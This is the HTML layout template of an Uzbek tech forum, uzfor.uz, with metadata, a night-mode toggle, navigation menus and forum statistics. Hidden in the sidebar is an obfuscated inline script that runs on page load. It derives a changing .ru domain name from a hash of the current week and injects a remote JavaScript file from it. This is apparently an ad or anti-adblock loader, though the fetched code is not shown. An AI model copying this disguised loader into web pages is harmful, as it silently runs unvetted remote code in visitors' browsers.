<html xmlns="http://www.w3.org/1999/xhtml" lang="ru">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta http-equiv="Content-Type" content="application/vnd.wap.xhtml+xml; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">
    <meta name="google-site-verification" content="OXKJcslapKdaRjz5ANbVrTASaxZZtXXQKe2hf4tBGk08">
    <meta name="yandex-verification" content="3f0b5a32a96d78f2">
    <meta name="google-site-verification" content="OXKJcslapKdaRjz5ANbVrTASaxZZtXXQKe2hf4BGk08">
    <meta name="HandheldFriendly" content="true">
    <meta name="MobileOptimized" content="width">
    <meta content="yes" name="apple-mobile-web-app-capable">
    <meta name="telegram:channel" content="@uzforuz">
    <link rel="manifest" href="../manifest.json">
    <meta name="Generator" content="UZFOR.UZ">
    <meta name="keywords" content="INTERNET, DASTURLASH, INTERNET TIJORAT, KOMPYUTER, TEXNIKA, TELEFON, OPERATORLAR, ILM-FAN, SEO OMALLASHTIRISH, RIVOJLANTIRISH, SAYT HAQIDA, wmr savosi, wmz savdosi, qiwi savdosi, baza savdosi, hostinglar, domenlar, bepul scriptlar, hammasi bepul, wap masterlar">
    <meta name="description" content="UZFOR.UZ - Bizning forum!">
    <link type="text/css" rel="stylesheet" media="only screen" href="https://uzfor.uz/theme/default/style.css?v=0.0.96">
    <link type="text/css" rel="stylesheet" media="only screen" href="https://uzfor.uz/theme/sidebar.css?v=0.0.96">
    <meta property="og:site_name" content="UZFOR.UZ">
    <meta name="copyright" content="UZFOR.UZ - 2017">
    <meta name="author" content="Сирожиддин Эрназаров">
    <meta name="web_copy_date" content="07-10-2017">
    <meta name="expires" content="13-10-2029">
    <meta name="web_content_type" content="Tips">
    <meta name="country" content="UZ">
    <meta name="web_author" content="UZFOR.UZ">
    <meta name="reply-to" content="info@uzfor.uz">
    <meta name="robots" content="index, follow">
    <meta name="resource-type" content="document">
    <meta name="classification" content="internet">
    <meta name="distribution" content="global">
    <meta name="rating" content="safe for kids">
    <meta name="doc-type" content="public">
    <meta name="Identifier-URL" content="http://uzfor.uz/">
    <meta name="subject" content="uzfor, akt sohasi, texnologiyalar, ilm-fan">
    <meta name="contactName" content="UZFOR.UZ">
    <meta name="contactOrganization" content="UZFOR.UZ - Bizning forum!">
    <meta name="contactStreetAddress1" content="Urgench">
    <meta name="contactZipcode" content="221100">
    <meta name="contactCity" content="Khorem">
    <meta name="contactCountry" content="Uzbekistan">
    <meta name="contactPhoneNumber" content="+79777287639">
    <meta name="contactNetworkAddress" content="info@uzfor.uz">
    <meta name="linkage" content="https://uzfor.uz">
    <meta name="dc.language" content="english">
    <meta name="dc.source" content="https://uzfor.uz/">
    <meta name="dc.relation" content="https://uzfor.uz">
    <!-- Chrome, Firefox OS and Opera -->
    <meta name="theme-color" content="#537397">
    <!-- Windows Phone -->
    <meta name="msapplication-navbutton-color" content="#537397">
    <!-- iOS Safari -->
    <meta name="apple-mobile-web-app-status-bar-style" content="#537397">
    <style>
      .uzfor_progress {
      position: fixed;
      bottom: 0;
      z-index: 1;
      width: 100%;
      background-color: #f1f1f1;
      border-radius: 18px;
      }
      .progress-container {
      width: 100%;
      height: 4px;
      background: #fff;
      }
      .progress-bar {
      height: 4px;
      background: #5d80a6;
      width: 0%;
      border-radius: 2px;
      }
      div.sticky {
      position: -webkit-sticky;
      position: -moz-sticky;
      position: -ms-sticky;
      position: -o-sticky;
      position: sticky;
      top: 0;
      }
    </style>
    <link rel="shortcut icon" href="https://uzfor.uz/images/favicon.ico">
    <title>UZFOR.UZ - Bizning forum!</title>
  </head>
  <body class="">
   
    <style>
      .tungi-rejim {
      background-color: #1e1e2e;
      }
      .tungi-rejim .menu, .tungi-rejim .w3-sidebar {
      background: #27293d;
      color: #5d80a6;
      }
      .tungi-rejim .topclassd {
      background: #1e1e2e;
      border: 2px solid #419ef9;
      opacity: 0.8;
      }
      .tungi-rejim a:link, .tungi-rejim a:visited, .tungi-rejim a:active {
      color: #9a9a9a;
      text-decoration: none;
      }
      .tungi-rejim .yashirish {
      display: none;
      }
      .tungi-rejim .phdr, .tungi-rejim .tmn {
      background: #1e1e2e;
      color: #55677d;
      border: 0px;
      }
      .tungi-rejim .tmn img {
      display: none;
      }
      .tungi-rejim .border-bottom {
      border-bottom: 1px solid #1e1e2e!important;
      margin: 0px 10px;
      }
      .tungi-rejim .mfoot {
      border-top: 1px solid #1e1e2e;
      }
      .tungi-rejim textarea {
      background: #1e1e2e;
      border: 1px solid #1e1e2e;
      }
      .tungi-rejim a.mm_item:hover {
      background: #1e1e2e;
      text-decoration: none;
      }
    </style>
    <script>
      function TungiRejim() {
         var element = document.body;
         element.classList.toggle("tungi-rejim");
      }
    </script>
    <button style="position: fixed;left: 0;top:0;padding: 4px;margin: 10px;" class="a" onclick="TungiRejim()">Tungi rejim</button>
    <div style="width: 1100px;margin: auto;max-width: 100%;">
      <div class="w3-sidebar w3-bar-block w3-collapse w3-card w3-animate-left" style="width:270px;" id="mySidebar">
        <button class="w3-bar-item w3-button w3-large w3-hide-large" onclick="w3_close()">Paneni yashirish ×</button>
        <div class="menu">
          <!-- logo -->
          <span class="logo__image">
          <a href="/"><img src="https://uzfor.uz/images/uzfor_uz_logo.png?v=0.0.01" alt="logo" style="width: 70%;" class="img-fluid"></a>
          </span>
          <!-- logib va profile -->
          <center>
            <div class="border-bottom"></div>
            <p>
            </p>
            <div id="lm_prof_panel">
              <div class="owner_panel index_panel">
                <div class="ip_user_link">
                  <a class="al_u211967789" href="/profile.php" data-name="Sirojiddin Ernazarov" data-photo="rasm"><img class="op_fimg" style="border-radius: 40px;" src="/files/users/photo/87_tmp_1548426402.jpg">
                  </a>
                  <i class="i_arr"></i>
                  <div class="op_fcont">
                    <h2 class="op_header">
                      <a class="op_owner" href="/profile.php" data-name="Akbarali" data-photo="rasm">Akbarali</a>
                      <span class="MainMenuNotificationDot" data-id="menu-apps-notification"></span>
                    </h2>
                    <a href="/profile.php?act=edit">Profilni tahrirlash</a>
                  </div>
                </div>
              </div>
            </div>
            <p></p>
            <div class="border-bottom"></div>
          </center>
          <ul class="main_menu">
            <li class="mmi_feed">
              <a href="/50-forum-yangiliklari.html" data-skiponclick="1" class="mm_item al_menu">
                <i class="i_icon">
                  <div class="svgIcon svgIcon-menu svgIcon-menu__feed"></div>
                </i>
                <span class="mmi_wrap"><span class="mm_label">Yangiliklar</span></span>
              </a>
            </li>
            <li class="mmi_answers">
              <a href="/notifications.php" data-skiponclick="1" class="mm_item al_menu">
                <i class="i_icon">
                  <div class="svgIcon svgIcon-menu svgIcon-menu__notify"></div>
                </i>
                <span class="mmi_wrap"><span class="mm_label">Bildirishnomalar</span><em class="mm_counter">1</em></span>
              </a>
            </li>
            <li class="mmi_friends">
              <a href="/avatar/" data-skiponclick="1" class="mm_item al_menu">
                <i class="i_icon">
                  <div class="svgIcon svgIcon-menu svgIcon-menu__user_outline_28"></div>
                </i>
                <span class="mmi_wrap"><span class="mm_label">Avatar yaratish</span><span class="MainMenuNotificationDot" data-id="menu-apps-notification"></span></span>
              </a>
            </li>
            <li class="mmi_groups">
              <a href="/top.php" data-skiponclick="1" class="mm_item al_menu">
                <i class="i_icon">
                  <div class="svgIcon svgIcon-menu svgIcon-menu__users_outline_28"></div>
                </i>
                <span class="mmi_wrap"><span class="mm_label">Forum faollari</span></span>
              </a>
            </li>
            <li class="mmi_feed">
              <a href="/malumotnoma.php" data-skiponclick="1" class="mm_item al_menu">
                <i class="i_icon">
                  <div class="svgIcon svgIcon-menu svgIcon-menu__malumotnoma"></div>
                </i>
                <span class="mmi_wrap"><span class="mm_label">Yo'riqnoma</span></span>
              </a>
            </li>
            <li class="mmi_feed">
              <a href="/pay.php" data-skiponclick="1" class="mm_item al_menu">
                <i class="i_icon">
                  <div class="svgIcon svgIcon-menu svgIcon-menu__uzforpay"></div>
                </i>
                <span class="mmi_wrap"><span class="mm_label">Balansni to'ldirish</span><span class="MainMenuNotificationDot" data-id="menu-apps-notification"></span></span>
              </a>
            </li>
            <li class="mmi_ads">
              <a href="/dokon/" class="mm_item al_menu">
                <i class="i_icon">
                  <div class="svgIcon svgIcon-menu svgIcon-menu__advertising_outline_28"></div>
                </i>
                <span class="mmi_wrap"><span class="mm_label">Forum do'koni</span><span class="MainMenuNotificationDot" data-id="menu-apps-notification"></span></span>
              </a>
            </li>
            <li class="mmi_ads">
              <a href="/view.php?act=files" class="mm_item al_menu">
                <i class="i_icon">
                  <div class="svgIcon svgIcon-menu svgIcon-menu__uzforshop"></div>
                </i>
                <span class="mmi_wrap"><span class="mm_label">Forum fayllari</span></span>
              </a>
            </li>
            <li class="mmi_ads">
              <a href="/mukofot.php" class="mm_item al_menu">
                <i class="i_icon">
                  <div class="svgIcon svgIcon-menu svgIcon-menu__uzformukofot"></div>
                </i>
                <span class="mmi_wrap"><span class="mm_label">Mukofotlar</span></span>
              </a>
            </li>
            <li class="mmi_search">
              <a href="/search.php" data-skiponclick="1" class="mm_item al_menu" data-header="Поиск">
                <i class="i_icon">
                  <div class="svgIcon svgIcon-menu svgIcon-menu__search_outline_28"></div>
                </i>
                <span class="mmi_wrap"><span class="mm_label">Forumdan qidirish</span></span>
              </a>
            </li>
          </ul>
          <div class="mfoot" role="navigation" aria-label="Boshqa">
            <ul class="left_footer_menu">
              <li class="mmi_settings">
                <a href="/about.php" data-skiponclick="1" class="lfm_item al_menu">
                  <i class="i_icon">
                    <div class="svgIcon svgIcon-menu svgIcon-menu__"></div>
                  </i>
                  <span class="mmi_wrap"><span class="mm_label">Sayt haqida</span></span>
                </a>
              </li>
              <li class="mmi_fv">
                <a href="/exit.php" data-skiponclick="1" class="lfm_item">
                  <i class="i_icon">
                    <div class="svgIcon svgIcon-menu svgIcon-menu__"></div>
                  </i>
                  <span class="mmi_wrap"><span class="mm_label">Profildan chiqish</span></span>
                </a>
              </li>
            </ul>
          </div>
        </div>
        <script type="text/javascript">(function(){var s = 'abcdefghijklmnopqrstuvwxyz';function f(v){return Math.abs(v.split('').reduce(function(w,x){return w=(w<<5)-w+x.charCodeAt(0),w&w},0))}function g(v){return(26<=v?g((v/26>>0)-1):'')+s[v%26>>0]}function n(v) {var m = '';for (var i = 0; i < v; i++){m += s.charAt(Math.floor(Math.random() * s.length));}return m;}function m(v) {return Math.floor(Math.random() * Math.floor(v));}var j=673873,r=''+Math.ceil((Date.now()-1.5147648e12)/6.048e8)*j,p=11814,l=''+j+''+p,t=document;p=t.createElement('script');p.type='text/javascript';p.src='//'+g(f(j+r))+(''+f(j+r)).slice(-1)+g(f(j+(r+1)))+'.ru/'+n(7)+m(9)+n(7)+l+'.js';t.getElementById('iota7rho11814').appendChild(p)})();</script>
      </div>
      <script>
        function w3_open() {
          document.getElementById("mySidebar").style.display = "block";
        }
        
        function w3_close() {
          document.getElementById("mySidebar").style.display = "none";
        }
      </script>
      <div class="w3-main" style="margin-left: 270px;">
        <div class="w3-teal">
          <div class="menu" style="padding: 2px;border-radius: 4px;">
            <div class="topclassd sticky" style="">
              <table width="100%" cellpadding="0" cellspacing="0">
                <tbody>
                  <tr>
                    <td class="w3-hide-large">
                      <a class="topa w3-button w3-teal w3-xlarge w3-hide-large" onclick="w3_open()" style="font-size: 20px;">
                      <img src="https://uzfor.uz/images/uzfor_hamburger.png?v=0.0.1" style="margin-bottom: -3px; height: 18px;" alt="Menu "></a>
                    </td>
                    <td>
                      <a class="topa" href="https://uzfor.uz/">
                      <img src="https://uzfor.uz/images/svg/home.svg" style="margin-bottom: -3px; height: 18px;" alt="Bosh sahifa">
                      </a>
                    </td>
                    <td>
                      <a class="topa" href="https://uzfor.uz/lenta.php">
                        <img src="https://uzfor.uz/images/svg/tasma.svg" style="margin-bottom: -3px; height: 18px;" alt="Lenta "> <!-- 415 -->
                      </a>
                    </td>
                    <td>
                      <a class="topa" href="https://uzfor.uz/chat/index.php">
                      <img src="https://uzfor.uz/images/svg/chat.svg" style="margin-bottom: -4px; height: 20px;" alt="Chat"> 42 
                      </a>
                    </td>
                    <td id="languages">
                      <a class="topa" id="cirilica" style="cursor: pointer;" onclick="$('#cirilica').hide();$('#latinica').fadeIn();$('#latinica').html();" title="Ўзбек кирилл алифбосига ўтиш">
                      O'zb
                      </a>
                      <a class="topa" id="latinica" style="display: none;cursor: pointer;" onclick="$('#latinica').hide();$('#cirilica').fadeIn();$('#cirilica').html();" title="O'zbek lotin alifbosiga o'tish">
                      O'zb
                      </a>
                    </td>
                  </tr>
                </tbody>
              </table>
            </div>
            <style>
              .menubar_count {
              border-radius: 9px;
              background: #ff3347;
              font-size: 12px;
              color: #fff;
              padding: 0 4px;
              position: absolute;
              }
            </style>
            <div class="topclassd" style="position: fixed;bottom: 0;box-shadow: 0px 10px 10px 6px #00000045;border-radius: 0;background: rgba(255,255,255,.14);-webkit-backdrop-filter: blur(12px);backdrop-filter: blur(12px);border: 0;width: 1100px;margin: auto;max-width: 100%;left: 0;right: 0;">
              <ul>
                <table width="100%" cellpadding="0" cellspacing="0">
                  <tbody>
                    <tr>
                      <td>
                        <li style="text-align: center;" class="mmi_docs">
                          <a href="/lenta.php" data-skiponclick="1" class="mm_item al_menu" align="center">
                            <i style="float: none;" class="i_icon">
                              <div class="svgIcon svgIcon-menu svgIcon-menu__document_outline_28"></div>
                            </i>
                          </a>
                        </li>
                      </td>
                      <td>
                        <li style="text-align: center;" class="mmi_answers">
                          <a href="/notifications.php" data-skiponclick="1" class="mm_item al_menu">
                            <i style="float: none;" class="i_icon">
                              <div class="svgIcon svgIcon-menu svgIcon-menu__notify"></div>
                            </i>
                          </a>
                        </li>
                      </td>
                      <td>
                        <li style="text-align: center;" class="mmi_mail">
                          <a href="/mail.php" data-skiponclick="1" class="mm_item al_menu">
                            <i style="float: none;" class="i_icon">
                              <div class="svgIcon svgIcon-menu svgIcon-menu__message_outline_28"></div>
                            </i>
                          </a>
                        </li>
                      </td>
                      <td>
                        <li style="text-align: center;" class="mmi_feed">
                          <a href="/pay.php" data-skiponclick="1" class="mm_item al_menu">
                            <i style="float: none;" class="i_icon">
                              <div class="svgIcon svgIcon-menu svgIcon-menu__uzforpay"></div>
                            </i>
                          </a>
                        </li>
                      </td>
                    </tr>
                  </tbody>
                </table>
              </ul>
            </div>
            <?= $this->section('content') ?>
            <div class="tmn">
              <div><a href="https://uzfor.uz/users.php?act=online"><img src="https://uzfor.uz/theme/default/images/menu_online.png" alt="-" class="icon"> Onlayn: 59 (3/56)</a></div>
              <div><a href="https://uzfor.uz/profile.php"><img src="https://uzfor.uz/theme/default/images/menu_cabinet.png" alt="-" class="icon"> Shaxsiy profil</a><br></div>
              <div><a href="https://uzfor.uz/search.php"><img src="https://uzfor.uz/theme/default/images/tool.png" alt="-" class="icon"> Forumdan qidirish</a><br></div>
              <br>
              <div> - Faol mavzular soni: <b> 2,746 ta</b></div>
              <div> - Barcha xabarlar soni:<b> 85,024 ta</b></div>
              <div>- Forum a'zolari: <b>4,749 nafar</b></div>
              <div>- So'ngi a'zo: <b> <a href="/profile.php?user=8977" <b="">BOYBOLA1XBETSTAVKA</a></b></div>
            </div>
            <div class="phdr">
              © 2017-2021 UZFOR.UZ<br>
              <a href="/qoida.php">Qoidalar</a> *
              <a href="/malumotnoma.php">Ma'lumotnoma</a> *
              <a href="/reklama.php?act=reklama_berish">Reklama</a> *
              <a href="/about.php">Sayt haqida</a> *
              <a href="/sayt_xaritasi.php">Sayt xaritasi</a> *
              <a href="/stat.php">Sayt statistikasi</a>
            </div>
          </div>
          <center>
            Tezlik: 0.195<br>
            <br>
          </center>
        </div>
      </div>
    </div>
  </body>
</html>